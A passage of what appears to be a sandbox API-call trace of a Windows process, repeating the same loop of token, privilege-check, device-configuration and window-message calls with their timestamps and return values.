pHWProfileInfo=0x0) returned 0x3 [0084.783] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.783] GetCurrentThread () returned 0xfffffffe [0084.783] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.783] GetLastError () returned 0x3f0 [0084.783] GetCurrentProcess () returned 0xffffffff [0084.783] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.783] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.783] SetLastError (dwErrCode=0x522) [0084.783] CloseHandle (hObject=0x114) returned 1 [0084.783] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.783] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.783] GetLastError () returned 0x578 [0084.783] SetLastError (dwErrCode=0x578) [0084.783] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.783] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.783] GetCurrentThread () returned 0xfffffffe [0084.783] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.784] GetLastError () returned 0x3f0 [0084.784] GetCurrentProcess () returned 0xffffffff [0084.784] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.784] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.784] SetLastError (dwErrCode=0x522) [0084.784] CloseHandle (hObject=0x114) returned 1 [0084.784] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.784] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.784] GetLastError () returned 0x578 [0084.784] SetLastError (dwErrCode=0x578) [0084.784] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.784] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.784] GetCurrentThread () returned 0xfffffffe [0084.784] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.784] GetLastError () returned 0x3f0 [0084.784] GetCurrentProcess () returned 0xffffffff [0084.784] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.784] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.784] SetLastError (dwErrCode=0x522) [0084.784] CloseHandle (hObject=0x114) returned 1 [0084.784] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.784] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.784] GetLastError () returned 0x578 [0084.784] SetLastError (dwErrCode=0x578) [0084.784] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.784] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.784] GetCurrentThread () returned 0xfffffffe [0084.784] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.784] GetLastError () returned 0x3f0 [0084.784] GetCurrentProcess () returned 0xffffffff [0084.784] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.784] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.784] SetLastError (dwErrCode=0x522) [0084.784] CloseHandle (hObject=0x114) returned 1 [0084.784] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.784] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.784] GetLastError () returned 0x578 [0084.784] SetLastError (dwErrCode=0x578) [0084.784] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.784] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.784] GetCurrentThread () returned 0xfffffffe [0084.784] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.785] GetLastError () returned 0x3f0 [0084.785] GetCurrentProcess () returned 0xffffffff [0084.785] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.785] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.785] SetLastError (dwErrCode=0x522) [0084.785] CloseHandle (hObject=0x114) returned 1 [0084.785] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.785] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.785] GetLastError () returned 0x578 [0084.785] SetLastError (dwErrCode=0x578) [0084.785] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.785] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.785] GetCurrentThread () returned 0xfffffffe [0084.785] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.785] GetLastError () returned 0x3f0 [0084.785] GetCurrentProcess () returned 0xffffffff [0084.785] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.785] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.785] SetLastError (dwErrCode=0x522) [0084.785] CloseHandle (hObject=0x114) returned 1 [0084.785] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.785] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.785] GetLastError () returned 0x578 [0084.785] SetLastError (dwErrCode=0x578) [0084.785] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.785] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.785] GetCurrentThread () returned 0xfffffffe [0084.785] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.785] GetLastError () returned 0x3f0 [0084.785] GetCurrentProcess () returned 0xffffffff [0084.785] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.785] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.785] SetLastError (dwErrCode=0x522) [0084.785] CloseHandle (hObject=0x114) returned 1 [0084.785] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.785] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.785] GetLastError () returned 0x578 [0084.785] SetLastError (dwErrCode=0x578) [0084.785] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.785] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.785] GetCurrentThread () returned 0xfffffffe [0084.785] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.786] GetLastError () returned 0x3f0 [0084.786] GetCurrentProcess () returned 0xffffffff [0084.786] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.786] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.786] SetLastError (dwErrCode=0x522) [0084.786] CloseHandle (hObject=0x114) returned 1 [0084.786] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.786] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.786] GetLastError () returned 0x578 [0084.786] SetLastError (dwErrCode=0x578) [0084.786] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.786] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.786] GetCurrentThread () returned 0xfffffffe [0084.786] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.786] GetLastError () returned 0x3f0 [0084.786] GetCurrentProcess () returned 0xffffffff [0084.786] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.786] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.786] SetLastError (dwErrCode=0x522) [0084.786] CloseHandle (hObject=0x114) returned 1 [0084.786] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.786] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.786] GetLastError () returned 0x578 [0084.786] SetLastError (dwErrCode=0x578) [0084.786] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.786] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.786] GetCurrentThread () returned 0xfffffffe [0084.786] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.786] GetLastError () returned 0x3f0 [0084.786] GetCurrentProcess () returned 0xffffffff [0084.786] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.786] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.786] SetLastError (dwErrCode=0x522) [0084.786] CloseHandle (hObject=0x114) returned 1 [0084.786] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.786] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.786] GetLastError () returned 0x578 [0084.786] SetLastError (dwErrCode=0x578) [0084.786] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.786] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.786] GetCurrentThread () returned 0xfffffffe [0084.786] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.786] GetLastError () returned 0x3f0 [0084.786] GetCurrentProcess () returned 0xffffffff [0084.787] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.787] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.787] SetLastError (dwErrCode=0x522) [0084.787] CloseHandle (hObject=0x114) returned 1 [0084.787] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.787] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.787] GetLastError () returned 0x578 [0084.787] SetLastError (dwErrCode=0x578) [0084.787] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.787] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.787] GetCurrentThread () returned 0xfffffffe [0084.787] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.787] GetLastError () returned 0x3f0 [0084.787] GetCurrentProcess () returned 0xffffffff [0084.787] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.787] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.787] SetLastError (dwErrCode=0x522) [0084.787] CloseHandle (hObject=0x114) returned 1 [0084.787] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.787] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.787] GetLastError () returned 0x578 [0084.787] SetLastError (dwErrCode=0x578) [0084.787] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.787] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.787] GetCurrentThread () returned 0xfffffffe [0084.787] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.787] GetLastError () returned 0x3f0 [0084.787] GetCurrentProcess () returned 0xffffffff [0084.787] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.787] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.787] SetLastError (dwErrCode=0x522) [0084.787] CloseHandle (hObject=0x114) returned 1 [0084.787] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.787] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.787] GetLastError () returned 0x578 [0084.787] SetLastError (dwErrCode=0x578) [0084.787] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.787] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.787] GetCurrentThread () returned 0xfffffffe [0084.787] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.787] GetLastError () returned 0x3f0 [0084.787] GetCurrentProcess () returned 0xffffffff [0084.788] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.788] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.788] SetLastError (dwErrCode=0x522) [0084.788] CloseHandle (hObject=0x114) returned 1 [0084.788] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.788] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.788] GetLastError () returned 0x578 [0084.788] SetLastError (dwErrCode=0x578) [0084.788] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.788] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.788] GetCurrentThread () returned 0xfffffffe [0084.788] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.788] GetLastError () returned 0x3f0 [0084.788] GetCurrentProcess () returned 0xffffffff [0084.788] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.788] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.788] SetLastError (dwErrCode=0x522) [0084.788] CloseHandle (hObject=0x114) returned 1 [0084.788] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.788] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.788] GetLastError () returned 0x578 [0084.788] SetLastError (dwErrCode=0x578) [0084.788] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.788] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.788] GetCurrentThread () returned 0xfffffffe [0084.788] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.788] GetLastError () returned 0x3f0 [0084.788] GetCurrentProcess () returned 0xffffffff [0084.788] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.788] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.788] SetLastError (dwErrCode=0x522) [0084.788] CloseHandle (hObject=0x114) returned 1 [0084.788] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.788] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.788] GetLastError () returned 0x578 [0084.788] SetLastError (dwErrCode=0x578) [0084.788] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.788] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.788] GetCurrentThread () returned 0xfffffffe [0084.788] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.788] GetLastError () returned 0x3f0 [0084.788] GetCurrentProcess () returned 0xffffffff [0084.789] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.789] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.789] SetLastError (dwErrCode=0x522) [0084.789] CloseHandle (hObject=0x114) returned 1 [0084.789] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.789] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.789] GetLastError () returned 0x578 [0084.789] SetLastError (dwErrCode=0x578) [0084.789] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.789] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.789] GetCurrentThread () returned 0xfffffffe [0084.789] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.789] GetLastError () returned 0x3f0 [0084.789] GetCurrentProcess () returned 0xffffffff [0084.789] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.789] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.789] SetLastError (dwErrCode=0x522) [0084.789] CloseHandle (hObject=0x114) returned 1 [0084.789] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.789] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.789] GetLastError () returned 0x578 [0084.789] SetLastError (dwErrCode=0x578) [0084.789] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.789] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.789] GetCurrentThread () returned 0xfffffffe [0084.789] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.789] GetLastError () returned 0x3f0 [0084.789] GetCurrentProcess () returned 0xffffffff [0084.789] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.789] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.789] SetLastError (dwErrCode=0x522) [0084.789] CloseHandle (hObject=0x114) returned 1 [0084.789] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.789] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.789] GetLastError () returned 0x578 [0084.789] SetLastError (dwErrCode=0x578) [0084.789] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.789] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.789] GetCurrentThread () returned 0xfffffffe [0084.789] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.789] GetLastError () returned 0x3f0 [0084.789] GetCurrentProcess () returned 0xffffffff [0084.789] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.790] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.790] SetLastError (dwErrCode=0x522) [0084.790] CloseHandle (hObject=0x114) returned 1 [0084.790] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.790] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.790] GetLastError () returned 0x578 [0084.790] SetLastError (dwErrCode=0x578) [0084.790] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.790] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.790] GetCurrentThread () returned 0xfffffffe [0084.790] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.790] GetLastError () returned 0x3f0 [0084.790] GetCurrentProcess () returned 0xffffffff [0084.790] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.790] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.790] SetLastError (dwErrCode=0x522) [0084.790] CloseHandle (hObject=0x114) returned 1 [0084.790] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.790] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.790] GetLastError () returned 0x578 [0084.790] SetLastError (dwErrCode=0x578) [0084.790] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.790] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.790] GetCurrentThread () returned 0xfffffffe [0084.790] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 